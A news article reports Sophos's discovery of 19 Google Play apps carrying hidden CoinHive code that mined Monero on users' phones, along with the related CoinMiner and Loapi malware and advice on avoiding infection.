Hackers are using hidden codes to mine cryptocurrencies in Google Play apps

A malicious JavaScript code that mines open source cryptocurrency Monero, has been found inside 19 Android apps. Some of these apps had more than 100,000 installs.

Cryptocurrencies are turning out to be a playground for cyber criminals. Researchers say hackers could be mining cryptos on Android phones using hidden codes without the knowledge of users.

British security firm Sophos has identified 19 Google Play apps that are being used by hackers discreetly to mine ‘Monero’ — an open source cryptocurrency that operates on blockchain technology. These Android apps contain “embedded CoinHive-based miners” that allow hackers to generate Monero using the apps’ in-built browser.

Because the malicious CoinHive code is hidden, users are unaware that crypto is being mined on their devices. They could experience some sluggishness or heating on their phones due to the CPU strain, but there’s no other indication.

Sometimes, hackers are able to conceal even that by CPU throttling (when the device is slowed down to use less energy). Sophos found that the malicious JavaScript code was hidden in HTML files in the targeted apps’ assets folder.

Android malware

Interestingly, all 19 apps being used to mine Monero seem to have been built by the same developer. A chunk of these apps contained wrestling videos and information, and were released around Christmas. Some of these had recorded over 100,000 installs. Pankaj Kohli, Threat Researcher at Sophos, said,

Google Play has become a favourite malware distribution point to infect smartphones with cryptocurrency miners. Bitcoin-mining malware has a long history in Google Play, with the first family — Andr/LepriCon-A — appearing in 2014.

Sophos had earlier recorded over 28,000 Loapi mining malware variants. Most of them were released between June and November 2017 when Bitcoin’s price surged nearly 500 percent.

Hackers might be using another method as well for mining cryptos on Android devices. This utilises “third-party mining modules” such as ‘CoinMiner’ found in tampered versions of apps on third-party websites or official versions on Google Play Store. CoinMiner uses a version of ‘cpuminer’ to mine either BitCoins or Monero on a victim’s device.

One of the sites distributing samples riddled with CoinMiner is http://coandroid.ru. It offers apps disguised as an installer for popular Google Play apps including SafetyNet Wireless app, which offers its users subsidised cell phone service; Recitiamo Santo Rosario, a religious app; and Car Wallpaper HD Free, which allows users to automatically change their wallpaper daily. Sophos had notified Google of the malware, and these apps have been removed since then. Sophos states,

The rise of CoinHive and CoinMiner comes after the recent discovery of Loapi, which masquerades as popular antivirus apps or an adult content app. It downloads and installs several modules, each of which perform a different malicious action such as sending device information to a remote server, stealing SMS, fetching advertisements, crawling web pages, creating a proxy and mining Monero.

How to avoid

Android users should refrain from downloading and installing apps via untrusted third-party websites if they have to avoid falling victim to crypto mining. They should bank on genuine app stores only.

While some malware “evidently manages to slip through the net on the Play Store” as well, Sophos says, Google does endeavour to find and remove them, thus minimising risks. 

Accidental clicks on malicious ads can also lead to unwarranted crypto-mining on devices. These use malicious code hidden in ads to redirect users to sites where cyber criminals mine Monero. Mobile ad blockers can arrest malicious ads from showing up to an extent.

A separate report by Kaspersky Lab revealed recently that crypto mining can permanently damage user devices. While desktop computers may be able to bear the hardware stress that comes with cryptocurrency mining, mobile devices are more fragile and permanent damage to batteries can be incurred.

Hence, users have to be ultra careful of what they download, install, and click on.